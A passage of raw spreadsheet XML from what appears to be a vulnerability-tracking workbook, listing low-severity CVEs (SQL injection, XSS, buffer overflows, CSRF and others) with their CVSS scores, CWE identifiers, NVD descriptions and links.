users to scan and access internal network services. Version 2.18.2 contains a fix.</t></is></c><c r="T1543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t></is></c></row><row r="1544"><c r="A1544" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1544" s="5" t="inlineStr"><is><t>CVE-2026-84389</t></is></c><c r="D1544" s="5" t="n"><v>3.1</v></c><c r="E1544" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1544" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1544" s="5" t="inlineStr" /><c r="H1544" s="5" t="n"><v>0.001</v></c><c r="I1544" s="5" t="inlineStr" /><c r="J1544" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1544" s="5" t="inlineStr" /><c r="L1544" s="5" t="inlineStr" /><c r="M1544" s="5" t="inlineStr" /><c r="N1544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1544" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1544" s="5" t="inlineStr" /><c r="R1544" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1544" s="5" t="inlineStr"><is><t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T1544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t></is></c></row><row r="1545"><c r="A1545" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1545" s="5" t="inlineStr"><is><t>CVE-2026-86670</t></is></c><c r="D1545" s="5" t="n"><v>2.9</v></c><c r="E1545" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1545" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1545" s="5" t="inlineStr" /><c r="H1545" s="5" t="n"><v>0.003</v></c><c r="I1545" s="5" t="inlineStr" /><c r="J1545" s="5" t="inlineStr" /><c r="K1545" s="5" t="inlineStr" /><c r="L1545" s="5" t="inlineStr" /><c r="M1545" s="5" t="inlineStr" /><c r="N1545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1545" s="5" t="inlineStr" /><c r="R1545" s="5" t="inlineStr"><is><t>CWE-326, CWE-916</t></is></c><c r="S1545" s="5" t="inlineStr"><is><t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t></is></c></row><row r="1546"><c r="A1546" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1546" s="5" t="inlineStr"><is><t>CVE-2026-84392</t></is></c><c r="D1546" s="5" t="n"><v>2.7</v></c><c r="E1546" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1546" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1546" s="5" t="inlineStr" /><c r="H1546" s="5" t="n"><v>0.003</v></c><c r="I1546" s="5" t="inlineStr" /><c r="J1546" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1546" s="5" t="inlineStr" /><c r="L1546" s="5" t="inlineStr" /><c r="M1546" s="5" t="inlineStr" /><c r="N1546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1546" s="5" t="inlineStr" /><c r="R1546" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1546" s="5" t="inlineStr"><is><t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t></is></c><c r="T1546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t></is></c></row><row r="1547"><c r="A1547" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1547" s="5" t="inlineStr"><is><t>CVE-2026-82060</t></is></c><c r="D1547" s="5" t="n"><v>2.3</v></c><c r="E1547" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1547" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1547" s="5" t="inlineStr" /><c r="H1547" s="5" t="n"><v>0.002</v></c><c r="I1547" s="5" t="inlineStr" /><c r="J1547" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1547" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1547" s="5" t="inlineStr" /><c r="M1547" s="5" t="inlineStr" /><c r="N1547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1547" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1547" s="5" t="inlineStr" /><c r="R1547" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="S1547" s="5" t="inlineStr"><is><t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t></is></c><c r="T1547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t></is></c></row><row r="1548"><c r="A1548" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1548" s="5" t="inlineStr"><is><t>CVE-2026-82710</t></is></c><c r="D1548" s="5" t="n"><v>2.3</v></c><c r="E1548" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1548" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1548" s="5" t="inlineStr" /><c r="H1548" s="5" t="n"><v>0.004</v></c><c r="I1548" s="5" t="inlineStr" /><c r="J1548" s="5" t="inlineStr" /><c r="K1548" s="5" t="inlineStr" /><c r="L1548" s="5" t="inlineStr" /><c r="M1548" s="5" t="inlineStr" /><c r="N1548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1548" s="5" t="inlineStr" /><c r="R1548" s="5" t="inlineStr"><is><t>CWE-150</t></is></c><c r="S1548" s="5" t="inlineStr"><is><t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.

mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.

This issue affects usage_rules: from 0.1.18 before 1.2.8.</t></is></c><c r="T1548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t></is></c></row><row r="1549"><c r="A1549" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1549" s="5" t="inlineStr"><is><t>CVE-2026-58234</t></is></c><c r="D1549" s="5" t="n"><v>2.2</v></c><c r="E1549" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1549" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1549" s="5" t="inlineStr" /><c r="H1549" s="5" t="n"><v>0.002</v></c><c r="I1549" s="5" t="inlineStr" /><c r="J1549" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1549" s="5" t="inlineStr" /><c r="L1549" s="5" t="inlineStr" /><c r="M1549" s="5" t="inlineStr" /><c r="N1549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1549" s="5" t="inlineStr" /><c r="R1549" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="S1549" s="5" t="inlineStr"><is><t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t></is></c><c r="T1549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t></is></c></row><row r="1550"><c r="A1550" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1550" s="5" t="inlineStr"><is><t>CVE-2026-86512</t></is></c><c r="D1550" s="5" t="n"><v>2.1</v></c><c r="E1550" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1550" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1550" s="5" t="inlineStr" /><c r="H1550" s="5" t="n"><v>0.002</v></c><c r="I1550" s="5" t="inlineStr" /><c r="J1550" s="5" t="inlineStr" /><c r="K1550" s="5" t="inlineStr" /><c r="L1550" s="5" t="inlineStr" /><c r="M1550" s="5" t="inlineStr" /><c r="N1550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1550" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1550" s="5" t="inlineStr" /><c r="R1550" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="S1550" s="5" t="inlineStr"><is><t>A vulnerability was identified in java-json-tools json-patch up to 1.13. This affects the function CopyOperation.apply/MoveOperation.apply of the file src/main/java/com/github/fge/jsonpatch/CopyOperation.java of the component Copy Move Operations. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t></is></c></row><row r="1551"><c r="A1551" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1551" s="5" t="inlineStr"><is><t>CVE-2026-86514</t></is></c><c r="D1551" s="5" t="n"><v>2.1</v></c><c r="E1551" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1551" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1551" s="5" t="inlineStr" /><c r="H1551" s="5" t="n"><v>0.003</v></c><c r="I1551" s="5" t="inlineStr" /><c r="J1551" s="5" t="inlineStr" /><c r="K1551" s="5" t="inlineStr" /><c r="L1551" s="5" t="inlineStr" /><c r="M1551" s="5" t="inlineStr" /><c r="N1551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1551" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1551" s="5" t="inlineStr" /><c r="R1551" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S1551" s="5" t="inlineStr"><is><t>A weakness has been identified in vgmstream up to r2117. This issue affects the function sscanf of the file src/meta/txth.c of the component txth-txtp. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 4669d37a6af94866f6f0628678f9f90d46954e8b. To fix this issue, it is recommended to deploy a patch.</t></is></c><c r="T1551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t></is></c></row><row r="1552"><c r="A1552" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1552" s="5" t="inlineStr"><is><t>CVE-2026-86515</t></is></c><c r="D1552" s="5" t="n"><v>2.1</v></c><c r="E1552" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1552" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1552" s="5" t="inlineStr" /><c r="H1552" s="5" t="n"><v>0.003</v></c><c r="I1552" s="5" t="inlineStr" /><c r="J1552" s="5" t="inlineStr" /><c r="K1552" s="5" t="inlineStr" /><c r="L1552" s="5" t="inlineStr" /><c r="M1552" s="5" t="inlineStr" /><c r="N1552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1552" s="5" t="inlineStr" /><c r="R1552" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1552" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t></is></c><c r="T1552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t></is></c></row><row r="1553"><c r="A1553" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1553" s="5" t="inlineStr"><is><t>CVE-2026-86517</t></is></c><c r="D1553" s="5" t="n"><v>2.1</v></c><c r="E1553" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1553" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1553" s="5" t="inlineStr" /><c r="H1553" s="5" t="n"><v>0.002</v></c><c r="I1553" s="5" t="inlineStr" /><c r="J1553" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1553" s="5" t="inlineStr" /><c r="L1553" s="5" t="inlineStr" /><c r="M1553" s="5" t="inlineStr" /><c r="N1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1553" s="5" t="inlineStr" /><c r="R1553" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1553" s="5" t="inlineStr"><is><t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t></is></c><c r="T1553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t></is></c></row><row r="1554"><c r="A1554" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1554" s="5" t="inlineStr"><is><t>CVE-2026-86518</t></is></c><c r="D1554" s="5" t="n"><v>2.1</v></c><c r="E1554" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1554" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1554" s="5" t="inlineStr" /><c r="H1554" s="5" t="n"><v>0.002</v></c><c r="I1554" s="5" t="inlineStr" /><c r="J1554" s="5" t="inlineStr" /><c r="K1554" s="5" t="inlineStr" /><c r="L1554" s="5" t="inlineStr" /><c r="M1554" s="5" t="inlineStr" /><c r="N1554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1554" s="5" t="inlineStr" /><c r="R1554" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1554" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T1554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t></is></c></row><row r="1555"><c r="A1555" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1555" s="5" t="inlineStr"><is><t>CVE-2026-86668</t></is></c><c r="D1555" s="5" t="n"><v>2.1</v></c><c r="E1555" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1555" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1555" s="5" t="inlineStr" /><c r="H1555" s="5" t="n"><v>0.003</v></c><c r="I1555" s="5" t="inlineStr" /><c r="J1555" s="5" t="inlineStr" /><c r="K1555" s="5" t="inlineStr" /><c r="L1555" s="5" t="inlineStr" /><c r="M1555" s="5" t="inlineStr" /><c r="N1555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1555" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1555" s="5" t="inlineStr" /><c r="R1555" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1555" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.15. The impacted element is the function uploadFile of the file controllers/pic.php. Such manipulation of the argument outerSrc/selectPhoto leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t></is></c></row><row r="1556"><c r="A1556" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1556" s="5" t="inlineStr"><is><t>CVE-2026-86674</t></is></c><c r="D1556" s="5" t="n"><v>2.1</v></c><c r="E1556" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1556" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1556" s="5" t="inlineStr" /><c r="H1556" s="5" t="n"><v>0.002</v></c><c r="I1556" s="5" t="inlineStr" /><c r="J1556" s="5" t="inlineStr" /><c r="K1556" s="5" t="inlineStr" /><c r="L1556" s="5" t="inlineStr" /><c r="M1556" s="5" t="inlineStr" /><c r="N1556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1556" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1556" s="5" t="inlineStr" /><c r="R1556" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S1556" s="5" t="inlineStr"><is><t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t></is></c></row><row r="1557"><c r="A1557" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1557" s="5" t="inlineStr"><is><t>CVE-2026-86675</t></is></c><c r="D1557" s="5" t="n"><v>2.1</v></c><c r="E1557" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1557" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1557" s="5" t="inlineStr" /><c r="H1557" s="5" t="n"><v>0.002</v></c><c r="I1557" s="5" t="inlineStr" /><c r="J1557" s="5" t="inlineStr" /><c r="K1557" s="5" t="inlineStr" /><c r="L1557" s="5" t="inlineStr" /><c r="M1557" s="5" t="inlineStr" /><c r="N1557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1557" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1557" s="5" t="inlineStr" /><c r="R1557" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1557" s="5" t="inlineStr"><is><t>A vulnerability was identified in itsourcecode Sales and Inventory System 1.0. This affects an unknown part of the file /pages/us_edit.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used.</t></is></c><c r="T1557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t></is></c></row><row r="1558"><c r="A1558" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1558" s="5" t="inlineStr"><is><t>CVE-2026-16003</t></is></c><c r="D1558" s="5" t="n"><v>2</v></c><c r="E1558" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1558" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1558" s="5" t="inlineStr" /><c r="H1558" s="5" t="n"><v>0.001</v></c><c r="I1558" s="5" t="inlineStr" /><c r="J1558" s="5" t="inlineStr" /><c r="K1558" s="5" t="inlineStr" /><c r="L1558" s="5" t="inlineStr" /><c r="M1558" s="5" t="inlineStr" /><c r="N1558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1558" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1558" s="5" t="inlineStr" /><c r="R1558" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1558" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t></is></c></row><row r="1559"><c r="A1559" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1559" s="5" t="inlineStr"><is><t>CVE-2026-86644</t></is></c><c r="D1559" s="5" t="n"><v>2</v></c><c r="E1559" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1559" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1559" s="5" t="inlineStr" /><c r="H1559" s="5" t="n"><v>0.003</v></c><c r="I1559" s="5" t="inlineStr" /><c r="J1559" s="5" t="inlineStr" /><c r="K1559" s="5" t="inlineStr" /><c r="L1559" s="5" t="inlineStr" /><c r="M1559" s="5" t="inlineStr" /><c r="N1559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1559" s="5" t="inlineStr" /><c r="R1559" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1559" s="5" t="inlineStr"><is><t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t></is></c><c r="T1559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t></is></c></row><row r="1560"><c r="A1560" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1560" s="5" t="inlineStr"><is><t>CVE-2026-86667</t></is></c><c r="D1560" s="5" t="n"><v>2</v></c><c r="E1560" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1560" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1560" s="5" t="inlineStr" /><c r="H1560" s="5" t="n"><v>0.002</v></c><c r="I1560" s="5" t="inlineStr" /><c r="J1560" s="5" t="inlineStr" /><c r="K1560" s="5" t="inlineStr" /><c r="L1560" s="5" t="inlineStr" /><c r="M1560" s="5" t="inlineStr" /><c r="N1560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1560" s="5" t="inlineStr" /><c r="R1560" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1560" s="5" t="inlineStr"><is><t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t></is></c></row><row r="1561"><c r="A1561" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1561" s="5" t="inlineStr"><is><t>CVE-2026-9215</t></is></c><c r="D1561" s="5" t="n"><v>1.8</v></c><c r="E1561" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1561" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1561" s="5" t="inlineStr" /><c r="H1561" s="5" t="n"><v>0.001</v></c><c r="I1561" s="5" t="inlineStr" /><c r="J1561" s="5" t="inlineStr" /><c r="K1561" s="5" t="inlineStr"><is><t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t></is></c><c r="L1561" s="5" t="inlineStr" /><c r="M1561" s="5" t="inlineStr" /><c r="N1561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1561" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1561" s="5" t="inlineStr" /><c r="R1561" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1561" s="5" t="inlineStr"><is><t>A cross site request forgery (CSRF) vulnerability in the listed NETGEAR models allows an attacker who can leverage social engineering techniques on a router administrator to tamper with router configuration and disrupt router operations with active assistance from the router administrator. There is no confidentiality impact due to this vulnerability.</t></is></c><c r="T1561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t></is></c></row><row r="1562"><c r="A1562" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1562" s="5" t="inlineStr"><is><t>CVE-2026-9216</t></is></c><c r="D1562" s="5" t="n"><v>1.2</v></c><c r="E1562" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1562" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1562" s="5" t="inlineStr" /><c r="H1562" s="5" t="n"><v>0.002</v></c><c r="I1562" s="5" t="inlineStr" /><c r="J1562" s="5" t="inlineStr" /><c r="K1562" 